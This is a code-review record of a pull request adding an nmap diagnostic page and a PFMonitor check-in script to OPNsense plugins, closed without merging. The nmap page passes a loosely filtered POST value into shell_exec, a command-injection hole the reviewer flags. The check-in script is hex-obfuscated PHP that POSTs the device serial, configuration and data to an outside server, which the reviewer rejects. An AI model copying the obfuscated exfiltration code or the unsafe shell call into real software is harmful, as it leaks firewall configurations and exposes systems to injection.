### PR TITLE
PFMonitor Plugin, and NMAP Plugin Initial Release

### PR DESCRIPTION
**Pull request by pfmonitor**
NMAP Plugin and PFMonitor releases

This version of the NMAP plugin contains the fixes for the injection/xss vulnerability i found in the 1.0 version in the other branch.

As well, the PFMonitor plugin herein has been tested on several units without issues.

### CODE REVIEW

File: sysutils/nmap/src/www/diag_nmap.php [hunk 1]
```diff
@@ -0,0 +1,234 @@
...
+{
+    // To add words keep arrayes matched by numbers
+    $patterns[0] = '/open/';
+    $patterns[1] = '/filtered/';
+    $patterns[2] = '/closed/';
+    $patterns[3] = '/Host is up/';
+    $replacements[0] = '<b><font color="#00cc00">' . gettext("OPEN") . '</font></b>';
+    $replacements[1] = '<b><font color="#ff0000">' . gettext("FILTERED") . '</font></b>';
+    $replacements[2] = '<b><font color="#ff0000">' . gettext("CLOSED") . '</font></b>';
+    $replacements[3] = '<b><font color="#00cc00">' . gettext("HOST IS UP") . '</font></b>';
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: this beaks themes - I removed hardcoded colors from core where I got notified.

Comment (fabianfrz) [reply sysutils/nmap/src/www/diag_nmap.php]: BTW: The host can also be down.

File: sysutils/nmap/src/www/diag_nmap.php [hunk 2]
```diff
@@ -0,0 +1,234 @@
...
+    ksort($patterns);
+    ksort($replacements);
+    return preg_replace($patterns, $replacements, $string);
+}
+
+// What page, aka. action is being wanted
+// If they "get" a page but don't pass all arguments, smartctl will throw an error
+$action = (isset($_POST['action']) ? $_POST['action'] : $_GET['action']);
+$target = preg_replace("/[^A-Za-z0-9 \/.:-]/", '', $_POST['target']);
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: https://secure.php.net/manual/de/function.escapeshellarg.php

File: sysutils/nmap/src/www/diag_nmap.php [hunk 3]
```diff
@@ -0,0 +1,234 @@
...
+    </pre>';
+    break;
+  }
+
+  // Testing devices
+  case 'web':
+  {
+    $output = add_colors(shell_exec($smartctl . " -sS -Pn -p 22,80,88,139,443,445,3389,5000,5001,8000,8080,8443,8888,10000 " . $target));
+    echo '<pre>Scanning ' . $target . $output . '
+    </pre>';
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: thats always the same code - make it DRY

File: sysutils/nmap/src/www/diag_nmap.php [hunk 4]
```diff
@@ -0,0 +1,234 @@
...
+                    </td>
+                  </tr>
+              </table>
+              </form>
+            </div>
+      </section>
+
+    <?php
+    } else {
+        echo gettext("No SMART devices.");
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: WHAT?

File: sysutils/nmap/src/www/diag_nmap.php [hunk 5]
```diff
@@ -0,0 +1,234 @@
...
+    SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+    INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+    CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+    ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+    POSSIBILITY OF SUCH DAMAGE.
+*/
+
+require_once("guiconfig.inc");
+
+$smartctl = "nmap";
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: 'smart' != 'nmap'

File: sysutils/nmap/src/www/diag_nmap.php [hunk 6]
```diff
@@ -0,0 +1,234 @@
...
+
+$valid_test_types = array("offline", "short", "long", "conveyance");
+$valid_info_types = array("i", "H", "c", "A", "a");
+$valid_log_types = array("error", "selftest");
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: all three: unused -> remove

File: net-mgmt/pfmonitor/src/opnsense/scripts/PFMonitor/checkin.php [hunk 7]
```diff
@@ -0,0 +1,10 @@
...
...66kn\x70d"]});$kwfwkugw="\x73\x63r\x75p\x6co\x61\x64";${"G\x4c\x4f\x42\x41\x4cS"}["bv\x79x\x78e\x6ab"]="s\x63\x72\x64a\x74\x61";${${"G\x4c\x4f\x42\x41\x4c\x53"}["\x79\x63\x6d\x69da"]}=curl_init(${${"\x47L\x4f\x42\x41L\x53"}["\x79\x79\x70q\x64vt\x65\x68\x6d"]});${${"\x47L\x4f\x42\x41\x4cS"}["x\x6c\x73w\x6ef\x61"]}=array("\x73\x65\x72ia\x6c"=>${${"\x47\x4c\x4fBALS"}["\x6au\x76e\x69\x6c"]},"confi\x67"=>${${"\x47\x4c\x4fBA\x4c\x53"}["\x6a\x78\x6e\x6b\x6e\x62\x78"]},"da\x74\x61"=>${${"\x47\x4cOB\x41\x4c\x53"}["b\x76yxx\x65jb"]});curl_setopt(${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x74\x75v\x75\x69\x71x\x6f\x6a\x6a"]},CURLOPT_POST,true);curl_setopt(${${"\x47L\x4fB\x41\x4cS"}["b\x79a\x63\x69\x78\x76f"]},CURLOPT_POSTFIELDS,http_build_query(${${"\x47\x4c\x4fB\x41\x4c\x53"}["xls\x77\x6e\x66\x61"]}));curl_setopt(${${"\x47L\x4fB\x41LS"}["am\x68\x73\x62\x65\x71"]},CURLOPT_RETURNTRANSFER,true);curl_setopt(${${"\x47\x4cOB\x41\x4c\x53"}["by\x61\x63\x69\x78\x76\x66"]},CURLOPT_CONNECTTIMEOUT,4);curl_setopt(${$kwfwkugw},CURLOPT_TIMEOUT,8);${${"\x47\x4c\x4f\x42\x41\x4c\x53"}["\x66bz\x73\x74\x63\x63\x78"]}=curl_exec(${$crohnqxijfx});curl_close(${${"\x47\x4c\x4f\x42\x41\x4cS"}["\x63\x63\x62xctk"]});}die();
```
Comment (fabianfrz) [inline net-mgmt/pfmonitor/src/opnsense/scripts/PFMonitor/checkin.php]: unacceptable in any way
* license probably incompatible BSD 2 CLAUSE
* obfuscated code (at least it does not look like it is malicious) but sends data to an external server

File: sysutils/nmap/src/www/diag_nmap.php [hunk 8]
```diff
@@ -0,0 +1,234 @@
...
+    $replacements[2] = '<b><font color="#ff0000">' . gettext("CLOSED") . '</font></b>';
+    $replacements[3] = '<b><font color="#00cc00">' . gettext("HOST IS UP") . '</font></b>';
+    ksort($patterns);
+    ksort($replacements);
+    return preg_replace($patterns, $replacements, $string);
+}
+
+// What page, aka. action is being wanted
+// If they "get" a page but don't pass all arguments, smartctl will throw an error
+$action = (isset($_POST['action']) ? $_POST['action'] : $_GET['action']);
```
Comment (fabianfrz) [inline sysutils/nmap/src/www/diag_nmap.php]: this is $_REQUEST FYI

File: sysutils/nmap/src/www/diag_nmap.php (hunk 3 above)
Comment (fabianfrz) [reply sysutils/nmap/src/www/diag_nmap.php]: not translated too

**Comment by pfmonitor** [comment]
Franco, i dont know how to push them individually.  Fabian, i made the changes you suggested except for a couple i took exception with.

**Pull request closed without merging**